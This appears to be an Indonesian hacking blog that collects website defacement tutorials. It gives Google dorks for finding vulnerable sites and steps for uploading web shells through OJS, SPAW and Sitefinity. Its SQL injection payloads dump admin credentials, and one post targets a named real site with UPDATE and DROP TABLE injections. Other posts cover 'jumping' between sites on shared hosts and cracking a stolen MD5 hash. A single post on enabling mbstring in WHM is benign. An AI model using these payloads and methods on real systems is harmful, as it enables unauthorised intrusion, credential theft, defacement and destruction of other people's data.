DEFACE JOMBANG
Exploit-ID adalah Indonesian Exploit Archive yang mempunyai tujuan
untuk berbagi tentang hal keamanan di bidang jaringan dan komputer.
Awal berdiri Exploi-ID merupakan ketidaksengajaan founder pertama
yang mempunyai cita-cita untuk membuat sebuah archive exploit. Dari
ide tersebut ternyata mendapat respon positif dari beberapa
senior hacker di Indonesia, sehingga dapat terbentuklah team untuk
menggarap Exploit-ID. Semoga Exploit-ID dapat menjadi solusi arsip
exploit yang berguna
Admin…
Exploit-ID is the Indonesian Exploit Archive which has the objective to
share about security in the area of network and computer. Initial
stand Exploi-ID is the founder of the first accident that has
aspirations to create an archive exploit. From that idea has received
positive responses from some senior hackers in Indonesia, so as to
forming a team to work on the Exploit-ID. Hopefully Exploit-ID can be a
useful solution for the exploits archive
Admin …
Jumat, 13 Juli 2018
Deface metode OJS
Kali ini w akan share Cara Deface OJS (Open Journal System) . bisa di bilang teknik ini ribet >:( . karena harus mengregistrasi dulu :3
Dork : intext:Journal "new submission"
inurl:/index.php/index/user/register
intext:about submission "Journal"
inurl:/index.php/ojs
*Yang laen use your dick eh brain :v
Tutorial :
1.Kamu harus mendaftar dulu disini > site,com/index.php/index/user/register
-Jangan Lupa untuk mencentang Registrasi sebabagi Author / penulis & Jangan ceklis Email konfimasi

2. Setelah Registasi Klik "New Submission"
3. Selesaikan Step 1
4. Di Step 2, kamu dapat upload shell (contoh format shell : a.phtml)

5.Jika Sukses ! maka akan muncul seperti ini

6.Cari akses shell nya
Penjelasan :
Filename : 4-4-1-SM.phtml
4 = id user u
Shell Path :
http://www.contoh.com/files/journals/1/articles/[iduser]/submission/original/[nama file].phtml
Contoh : files/journals/1/articles/4/submission/original/4-4-1-SM.phtml
Yap itu sedikit info tentang OJS
Semoga bermanfaat :v
Semoga bermanfaat :v
Tutorial Deface SQL Injection Manual
Tutorial Deface SQL Injection Manual
Ketemu lagi dengan Saya :) ^_^
kali ini kita akan membahas tentang Tutorial Cara SQL Manual / SQLI istilahnya ya :v
Oke pertama kita dork dulu ya :)
Dorknya:
inrul:/news.php?id= site:com .net .id
kembangi dengan Otak Vokers kau
Sekarang kita two the poin aja
target saya uda ada :)
Nah ini Target saya :)
Pertama kamu harus tambahkan sesuatu seperti (')
kan Web nya Blank berarti Vuln
sekarang kamu cari ordernya
sekarang kamu cari ordernya
contoh :
+order+by+1--+ ( no blank )
+order+by+2--+ (no blank )
+order+by+7--+ (no blank)
+order+by+7--+ (no blank)
+order+by+9--+ (blank)
cari dia sampai Blank
kan Blank dia No 8
nah kalian skrng https://site.com/berita.php?id=100'+union+select+1,2,3,4,5,6,7--+
untuk mecari angka togel :v
alian data bases nya
Ketemu kan Angka togelnya yang No. 2
sekarang kita Masukan Dios nya https://site.com/berita.php?id=100'+union+select+1,Concat(0x3c43656e7465723e,0x496e6a656374696f6e204279204d72765f323331,0x3c62723e,0x3c62723e,Version(),0x3c62723e,Database(),0x3c62723e,User(),@C:=0x3c62723e,If((Select+Count(*)+From+Information_Schema.Columns+Where+Table_Schema=Database()+And+@C:=Concat(@C,0x3c62723e,Table_Name,0x3a,0x3a,0x3a,0x3a,Column_Name)),0x3a,0x00),@C)
,3,4,5,6,7--+
kan ada no .2 itu kita ganti no.2 itu dengan Dios nya :)
nah kayak gini contoh nya tadi :)
sekarang kita akan mencari UserName dan Paswoardyang Dios itu yang tadi ganti sama
https://site.com/berita.php?id=100'+union+select+1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(h14471_13102016
.user)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x7e,password,0x3c62723e))))x)0
,3,4,5,6,7--+
nah ketemu kan username nya sama paswoard nya
kalau menemukan admin login pakai Otak kalianSekian Dari saya :)
Cara Deface Metode Spaw Uploads
Langsung aja yo:
1. Dork:
inurl:”spaw2/uploads/files/”
Setelah
sobat memasukan dork diatas dikotak pencarian google, pilih salah satu
web yang mau dideface. Tapi ingat, ngga semua website bisa dideface :p
Notes
: Dorknya bisa kalian ubah menurut kreativitas kalian masing-masing,
contoh saya tambahkan site:th pada akhir dork diatas. jadi
begini: inurl:”spaw2/uploads/files/” site:th
2). Setelah sobat masuk kedalam websitenya, sobat liat Url di addressbar. Contoh Urlnya :
http://contoh.com/spaw2/uploads/files/
3). Ganti pada Bagian /spaw2/uploads/files/ dengan kode dibawah ini :http://contoh.com/spaw2/uploads/files/
/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
sehingga menjadi seperti ini
http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file


Jika sudah Klik Upload.
Jika Proses Upload Selesai, Nanti akan Muncul Daftar File dan diantaranya ada File yang sobat upload tadi.

Tinggal Klik File sobat ~> Nanti akan muncul semacam info file ~> lalu Klik Download file ~> nanti akan muncul halaman Deface sobat
Done :p

Sekian tutorial sederhana untuk hari ini dari saya >.<
Mohon maaf bila ada salah kata / teknis ;)
Semoga bermanfaat.
Tutorial deface teknik site finity android
Tutorial deface teknik site finity android
Tutorial deface di android dengan metode site finity
Yoo mamang kali ini gua akan memberikan tutorial cara deface di android dengan metode site finity,
sebelumnya kalian udah tau kan apa itu deface?? kalo gatau mate j y lo hhh
kalau udah tau langsung saja simak tutorialnya:D
perhatian!!! kalian harus punya script deface nya dulu kalau tidak gimana mau deface nya??
kalau udah tau langsung saja simak tutorialnya:D
perhatian!!! kalian harus punya script deface nya dulu kalau tidak gimana mau deface nya??
1.buka browser kalian apa saja terserah lalu ke google
2.tulis dork nya berikut ini (inurl:"sitefinity/login.aspx) tanpa tanda buka kurung dan tutup kurung! lalu search
3.pilih lah salah satu website terserah kalian,klik website nya lalu tambahkan exploit nya sebagai berikut
(sitefinity/usercontrols/dialogs/documenteditordialog.aspx) tanpa buka tutup kurung! contoh
http://sitetarget.org/sitefinity/usercontrols/dialogs/documenteditordialog.aspx
4.lalu klik search kembali! nah disitu kalian klik chose file dan pilih script deface punya kalian
5.klik yang di bawah nya tunggu sampai loading selesai
6.tambah link target tadi dengan (/files) contoh http://sitetarget.org/files/namascriptdefacekalian.html lalu klik search
SELAMAT MENCOBA
Deface Teknik Jumping
MAS PINK HIDEN CYBER
Deface Teknik Jumping
Wasap gaes..
Yap kali ini gw akan share tutorial deface dengan teknik jumping, bagi
kalian yang belum mengerti apa itu jumping? apa itu kegunaan jumping?
kali ini ane akan sedikit bahas tentang metod jumping
Yok langsung saja :v
Apa itu jumping?
Jumping adalah ketika kita deface suatu web yang memiliki beberapa web/situs yang berada di 1 server
Apa kegunaan jumping?
Biar lu panen web xD xD :v
Bahan-Bahan :
Shell yang sudah ketanem
Kopi sama rokok :v
Shell yang ada filtur jumping nya tentunya
Langkah pertama !!
-
Pastikan shell lu ada filtur jumping nya
Nah kita bisa lihat banyak web yg bisa dijump :v
Nah selanjutnya kita klik config, untuk menggambil domain yang akan kita eksekusi
Kemudian kita klik config/hajar!!
Kemudian kita klik home, pilih folder config shell kalian
Kemudian kita pilih auto edit user sebagai u/p untuk login ke web panel admin
NB: Tools ini work jika dijalankan di dalam folder config
Kemudian klik hajar!!
Jika sudah akan muncul tampilan seperti ini, :v tinggal kita klik link nya
Masukin u/p yang sudah kita edit tadi
Yaap! Itulah sedikit ilmu/tutor dari saya tentang poc jumping shell :v
Semoga bermanfaat :v
Terimakasih ^_^
Greetz :
All Member Hacker Patah Hati
Menembus Password Login Menggunakan SQL Injection
HACKER JOMBANG
Menembus Password Login Menggunakan SQL Injection
Author: Mas Pink Hacker Jombang · Category: Algoritma, Pemograman, Tool, Database, Internet dan Web, Jaringan Komputer, Keamanan dan Hacking, Komputer DasarPada tulisan ini saya akan jelaskan tentang cara menembus password login dengan SQL injection
secara teoritis dengan melihat pada sisi kelemahan query bahasa SQL itu sendiri. SQL injection itu
sendiri adalah suatu cara untuk mengeksploitasi kelemahan bahasa SQL dengan cara memasukkan
(menginjeksikan) beberapa karakter tertentu. Deretan karakter tersebut biasa dikenal dengan nama
injection string. Ada banyak hal yang dapat dilakukan dengan injection string. Diantaranya,
mem-bypass password, mendapatkan nama tabel, menyisipkan anggota baru, dll, bahkan sampai
menghapus tabel pada suatu database.
Download Tulisan Lengkap: Mas Pink Hacke defAce-konsep-sql-menembus-login-dengan-sql-injection.pdf
Related Articles
- Aktifkan Multibyte String (Mbstring) Di WHM
- Kesalahan Umum dalam Membuat Password
- Membuat Password yang Handal
- Lama Waktu untuk Membongkar Password
- Mengganti Password Administrator pada Windows
- Tipe-Tipe Data Oracle 11g
- Strategi & Manajemen Password
- Penerapan Hill Chiper Pada Kemanan Pesan Teks
- Perbedaan Password, Passphrase, dan Passcode
- MD5 (Message-Digest algortihm 5)
- Trik Matikan Komputer Dengan Klik Kanan
- Penggunaan Enkripsi MD5 di Visual Basic
- Pengaturan Password di Aplikasi Web yang Dihasilkan oleh PHPMaker
- Mengetik Bahasa Arab di Windows XP
- Keamanan Wireless LAN
- Membuat Shortcut Pembuatan Table di Microsoft Word dengan Visual Basic Editor
- Penerjemah Bahasa Menggunakan PHP
- Cara Membuat Database di MySQL
- Mengganti Password Akun Windows dari CMD
- Aplikasi Password VB 2010 Dengan Database Ms. Access 2007
MengAktifkan Multibyte String (Mbstring) Di WHM
MENGAKTIFKAN MULTIBYTE STRING DI WHM
WHITE HATE CYBER HACKER
HACKER JOMBANG TEAM JAWA TIMUR
MengAktifkan Multibyte String (Mbstring) Di WHM
Hari ini (08/11/2017) saya selesai
upload website baru yang dibangun menggunakan CMS wordpress, namun terjadi
kenadala sedikit karena salah satu plugin tidak berjalan normal, pesan error
yang muncul :
Fatal error: Call to undefined function
mb_list_encodings() in /home/xxxxxx/public_html/wp-includes/SimplePie/Misc.php
on line 356
Tampilan
error pada plugin Wordpress
Mulailah mencari solusi melalui om google, tapi tidak banyak penjelasan
berbahasa indonesia mengenai masalah diatas, namun dengan kesabaran dan
ketabahan akhirnya ketemu juga solusinya.
Singkat kata, kendala Fatal error tersebut diakibatkan oleh settingan Mbstring,
oke...saya jelaskan sedikit makanan jenis yang disebut Mbstring. Mbstring
merupakan singkatan dari Multi–Byte String, merupakan perpanjangan dari bahasa
pemrograman PHP yang berfungsi untuk mengelola string non-ASCII dan digunakan
untuk konversi string ke pengkodean yang berbeda. Skema karakter encoding
multi-byte ini digunakan untuk mengekspresikan lebih dari 256 karakter dalam
byte biasa sistem pengkodean. Maka tidak heran ketika menggunakan sistem yang
memiliki string atau kaliamt yang dapat diterjemahkan selalu memerlukan
mbstring (jika diperlukan) misalnya seperti CMS WordPress (beberapa tema /
plugin).
Cara penangannya bisa melalui cpanel atau WHM, namun untuk penjelasan saya kali
ini melalui WHM, silakan login ke WHM seperti pada gambar dibawah ini
Halaman
login WHM
Setelah berhasil
login ke halaman WHM, cari Software >> EasyApache dalam
contoh ini EasyApache pada WHM saya menggunakan EasyApache 3
Software
pada WHM
Seperti sayang
saya sampaikan diatas, bahwa pada kasus ini di WHM saya menggunakan EasyApache
3, maka pada saat EasyApache 3 dipilih, akan muncul tampilan seperti pada
gambar dibawah ini :
EasyApache
3
Pada bagian profile, terlihat settingan DEFAULT, pilih
gambar kemudian
klik customize profile, akan muncul halaman Apache Version. Klik >>Next
Step
Apache
version
Selanjutnya akan muncul halaman PHP version, kemudian
klik >> Next Step seperti pada gambar dibawah ini
PHP
Version
Yang akan muncul
selanjutnya halaman Short Options List, pada halaman ini gerakan
kursor kebawah, dan cari tombol Exhaustive Options List pada
kanan bawah.
Short
Options List
Exhaustive
Options List
Akan muncul
spesifikasi pilihan, gerakan kursor kebawah dan cari Mbstring
Specific
choise
Centang
Mbstring
Centang kotak kecil
disamping kiri Mbstring, selanjutnya klik tombol Save and Build dan
akan muncul pertayaan klik I Understand
Save
and Build
Jika proses sesuai
dengan langkah-langkah diatas, maka akan muncul proses build, seperti pada
gambar dibawah ini :
Proses
build sedang berjalan
Anda memerlukan waktu
sekitar 3 sampai 5 menit menunggu proses ini berjalan, dan jika semua proses
berjalan dengan baik, maka tampilan paling akhir akan muncul Build Complete,
seperti pada gambar dibawah ini :
Build
complete
BELAJAR TEKNIK HACKING SQL INJECTIONS UNTUK PEMULA Belajar Teknik Hacking SQL Injection [Pada URL] - Untuk Pemula
BELAJAR TEKNIK HACKING SQL INJECTIONS UNTUK PEMULA
Belajar Teknik Hacking SQL Injection [Pada URL] - Untuk Pemula
Belajar Teknik Hacking SQL Injection [Pada URL]
Untuk Pemula
Untuk Pemula
Pada kesempatan kali ini, saya akan mencoba menerangkan tentang serangan ke suatu website menggunakan teknik SQL Injection. Saya akan menunjukkan SQL Injection melalui URL. Pada dasarnya caranya adalah sama karena keduanya sama- sama merupakan parameter input.
Teknik untuk menemukan nama field dan table ditemukan oleh david Litcfield. Teknik yang digunakan disini adalah dengan membuat terjadinya error menggunakan perintah having 1=1
STEP 1
Oke, kita langsung masuk ke contoh nyata. Web target kita kali ini ialah :
http://www.24x7learning.com/Press_Releases/news.asp?id=57
Untuk mendapatkan nama table dan nama field pertama, ialah dengan cara memasukkan perintah dibawah ini pada browser :
http://www.24x7learning.com/Press_Releases/news.asp?id=57 having 1=1
Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini :
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'media.id' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6
Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :
nama table = media
nama field pertama = id
STEP 2
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :
http://www.24x7learning.com/Press_Releases/news.asp?id=57 GROUP BY media.id having 1=1
Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini :
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'media.mediadate' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6
Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :
nama field kedua = mediadate
STEP 3
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :
http://www.24x7learning.com/Press_Releases/news.asp?id=57 GROUP BY media.id,media.mediadate having 1=1
Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'media.mediatitle' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6
Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :
nama field ketiga = mediatitle
STEP 4
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :
http://www.24x7learning.com/Press_Releases/news.asp?id=57 GROUP BY media.id,media.mediadate,media.mediatitle having 1=1
Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'media.mediapublisher' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6
Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :
nama field keempat= mediapublisher
STEP 5
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :
http://www.24x7learning.com/Press_Releases/news.asp?id=57 GROUP BY media.id,media.mediadate,media.mediatitle,media.mediapublisher having 1=1
Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini :
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'media.mediapath' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6
Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :
nama field kelima= mediapath
STEP 6
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :
http://www.24x7learning.com/Press_Releases/news.asp?id=57 GROUP BY media.id,media.mediadate,media.mediatitle,media.mediapublisher,media.mediapath having 1=1
Dengan perintah tersebut, maka kita akan mendapatkan pesan error, spt dibawah ini
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'media.ishtml' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/Press_Releases/news.asp, line 6
Dari pesan error diatas, bahwa kita mendapatkan informasi bahwa :
nama field keenam= ishtml
STEP 7
Untuk mendapatkan informasi nama field selanjutnya gunakan perintah berikut, pada web browser :
http://www.24x7learning.com/Press_Releases/news.asp?id=57 GROUP BY media.id,media.mediadate,media.mediatitle,media.mediapublisher,media.mediapath,media.ishtml having 1=1
Dengan perintah tersebut, maka kita tidak akan mendapatkan pesan error apapun. Artinya, bahwa pencarian field sudah selesai.
HACKING STEP....
MERUBAH DATA
Untuk merubah data, gunakanlah command SQL yaitu UPDATE. Contohnya kita akan merubah isi dari field ”mediapublisher”, perintah lengkapnya ialah :
http://www.24x7learning.com/Press_Releases/news.asp?id=57; UPDATE media set mediapublisher=’HACKER WAS HERE’ where id=57;
Sekarang Anda coba akses alamat :
http://www.24x7learning.com/Press_Releases/news.asp?id=57
Silahkan, lihat perubahannya.
MENGHAPUS TABLE
Tindakan yang paling “extreme” ialah menghapus/ drop table. Untuk melakukannya Anda bisa menggunakan comman SQL, yaitu DROP. Perintah lengkapnya ialah :
http://www.24x7learning.com/Press_Releases/news.asp?id=57; drop table
media;
End….
Artikel ini hanya untuk tujuan pembelajaran semata. Tidak pernah dibenarkan untuk melakukan kegiatan cracking kepada suatu website. Satu hal yang perlu Anda ketahui ialah dengan melakukan deface terhadap 100 website tidak akan menjadikan Anda seorang Hacker.
HACK WEBSITE DENGAN ANDROID
HACK WEBSITE DENGAN ANDROID
Hacking Website Dengan Android.
Sebagian besar situs yang dirusak oleh Hacker dilakukan dengan menggunakan kerentanan paling umum Yaitu SQL injection
Saya akan menggunakan Tools yang bernama
DroidSQLi.
![]() |
| Penampakan DroidSQLi |
Oke kita langsung aja.
1. Siapkan Handphone Android yang sudah terinstal Tools DroidSQLi Tentunya.
2. yang belum punya Tools DroidSQLi, bisa Cari sendiri ya.. Usaha dikit lah :D
3. Mencari situs yang rentan SQLi dengan Google Dork.
Google Dork Intip ---->> Disini
Oke, kita sudah mendapat target yg rentan dengan SQLi. .
Yang harus kita lakukan adalah memasukkan URL/LINK Target yang rentan SQLi
![]() |
| klik untuk perbesar |
- klik csb_ac_in_db
![]() |
| klik untuk perbesar |
- klik csb_admin
![]() |
| klik untuk perbesar |
- Selanjutnya, Centang username dan password admin lalu klik Get Records
![]() |
| klik untuk perbesar |
- Taraaaaaa..
![]() |
| klik untuk perbesar |
password : 4d4098d64e163d2726959455d046fd7c
password nya masih berbentuk MD5
& kita harus meng Crack password nya.
untuk meng Crack password nya
kita harus meluncur ke--->> SINI
Kita isi dengan password yang berbentuk MD5 tadi..
Isi kode Capcha & klik Sumbit.
![]() |
| klik untuk perbesar |
Dan Hasilnya..
![]() |
| klik untuk perbesar |
Langganan:
Komentar (Atom)



































